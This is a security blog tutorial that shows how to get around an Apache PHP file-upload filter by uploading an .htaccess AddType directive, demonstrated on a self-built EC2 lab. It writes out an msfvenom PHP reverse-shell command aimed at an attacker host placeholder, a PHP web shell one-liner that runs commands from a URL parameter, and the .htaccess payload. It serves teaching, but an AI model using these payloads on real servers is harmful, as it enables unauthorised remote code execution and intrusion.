Apache is one of the most popular http server nowadays. It hosts a hundreds of thousands applications, most of them written in PHP. Today I will present you how to bypass PHP file upload filters using MIME-type configuration changes.
This short directive,
AddType application/x-httpd-php .html
or, depends on service version,
AddHandler application/x-httpd-php5 .html
tells httpd to specify the Content-Type header for HTML files to be application/x-httpd-php. This way, both .php, .html or whatever page type containing PHP script that will be executed right after the page is sent to the browser. You can also add the above line in the .htaccess file in the directory where you want to run PHP scripts embedded to any page type.
Let’s see how the attacker may use that vulnerability to get into a server.
File upload functionality is one the common way to deliver and share content all over the internet. To prevent uploading malicious content, developers use filters to accept only a specific type of files and restrict executable content like .exe, .ps1, .sh and ect.
To see how the vulnerability works, I will leverage a AWS t3.micro EC2 instance. Creating VM, I would specify user data attribute to run simple Apache server:
#!/bin/bash
yum update -y
yum install -y httpd.x86_64
yum install -y php
systemctl start httpd.service
systemctl enable httpd.service
wget -q https://github.com/cybertechtalk/php-file-uploader/blob/main/index.php?raw=true -O /var/www/html/index.php
Before we start, check if security group allows tcp connection on port 80:
Now, open /index.php. Here we go, our file uploader is up and ready to hack:
So, first let’s check if we could upload *.php reverse shell directly on the machine. First, create shell using with msfvenom (see my previous post how to create simple reverse shell with msfvenom):
$ msfvenom -p php/reverse_php LHOST=<attacker-ip> LPORT=8888 -f raw > shell.php
And try to upload:
If you look at the code available on my github, you can find a filter, which allows only specific file to be uploaded. So, let’s adjust our malicious script and change file extension. Creating very simple php one liner:
<?php
$command = $_GET['cmd'];
echo exec($command);
?>
or reverse shell:
$ msfvenom -p php/reverse_php LHOST=<attacker-ip> LPORT=8888 -f raw > shell.cybertech
and upload one more time:
Nice, now go to http://<ec2-public-ip>/shell.cybertech:
Not exactly what we expected to see. Now, we have to force Apache (httpd) to interpret *.cybertech file as php application and run it. To do so, let’s create simple .htaccess directive:
$ echo "AddType application/x-httpd-php .cybertech" > .htaccess
AllowOverride to
All
for /var/www/html in /etc/httpd/conf/httpd. confand upload to the root folder:
Fine! Now, open http://<ec2-public-ip>/shell.cybertech again and try ?cmd=whoami:
In this example, I showed you a simple way to bypass restricted PHP file uploader leveraging httpd handler AddType application/x-httpd-php. For more interesting content please keep an eye on CyberTechTalk blog or like the post below.
Have a good day, be an ethical,
save your privacy!